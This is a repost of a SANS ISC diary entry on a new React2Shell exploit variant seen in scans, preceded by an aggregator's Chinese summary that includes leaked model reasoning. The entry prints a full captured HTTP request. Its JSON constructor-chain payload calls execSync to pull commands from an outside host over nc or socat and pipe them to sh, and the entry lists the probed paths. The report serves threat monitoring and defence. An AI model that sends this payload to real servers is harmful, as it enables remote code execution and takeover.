Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th)
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户的要求很明确,不需要特定的开头,直接写文章描述即可。 首先,我仔细阅读了文章内容。文章主要讨论了React2Shell漏洞的新变种,攻击者利用特定的HTTP请求来发起攻击。请求中包含了一些新的头部字段,比如"Rsc-Action"和"Next-Action",这可能意味着攻击目标扩展到了更多类型的网站,不仅仅是使用Next.js的。 接下来,文章提到攻击者尝试了不同的URL路径,如/api、/app等,这表明他们正在扩大攻击范围,寻找更多潜在的漏洞点。此外,文章还指出之前用来获取进一步指令的服务器已经不再响应,这可能意味着攻击活动暂时受阻或转移。 总结起来,文章的核心信息是React2Shell漏洞的新变种及其攻击手法的变化。我需要将这些关键点浓缩到100字以内,并且保持语言简洁明了。 在组织语言时,我会先点明主题:React2Shell漏洞的新变种。然后说明攻击方式:利用特定HTTP请求和头部字段。接着提到攻击路径的变化:尝试不同URL。最后指出后续指令服务器的问题:无法获取进一步指令。 这样组合起来应该能够准确传达文章的主要内容,并且符合用户的字数要求。 </think> React2Shell漏洞的新变种利用特定HTTP请求和头部字段(如Rsc-Action和Next-Action)发起攻击,并尝试访问不同URL路径(如/api、/app等)。该漏洞通过构造恶意JSON数据执行远程代码,但后续指令服务器已无法提供进一步操作。 2025-12-17 17:12:34 Author: isc.sans.edu(查看原文) 阅读量:6 收藏

I have already talked about various React2Shell exploit attempts we have observed in the last weeks. But new varieties of the exploit are popping up, and the most recent one is using this particular version of the exploit:

POST /app HTTP/1.1
Host: 81.187.66.58
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Next-Action: 0
Rsc-Action: 0
Content-Length: 388
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
Connection: close

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="$RSC"
Content-Type: application/json

{"0":{"0":{"0":{"constructor":{"constructor":{"constructor":"function() { const {execSync} = require('child_process'); return execSync('\n(nc 45.153.34.201 65050||socat - tcp:45.153.34.201:65050)|sh\n').toString(); }"}}}}}}
------WebKitFormBoundary7MA4YWxkTrZu0gW--

The overall idea is similar to what we have seen in the past. This version adds the "Rsc-Action" header, which I assume is supposed to target sites that expose react server components without Next.js. The "Next-Action" header is still present as well. The scans are also attempting different URLs:

/
/api
/app
/api/route
/_next/server


Other exploits have focused on the index page (/). I assume the pool of vulnerable systems is running dry, and attackers are diversifying their exploits a bit. Sadly, the host providing instructions for what to do next (45.153.34.201) is no longer providing these instructions.

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|


文章来源: https://isc.sans.edu/diary/rss/32578
如有侵权请联系:admin#unsafe.sh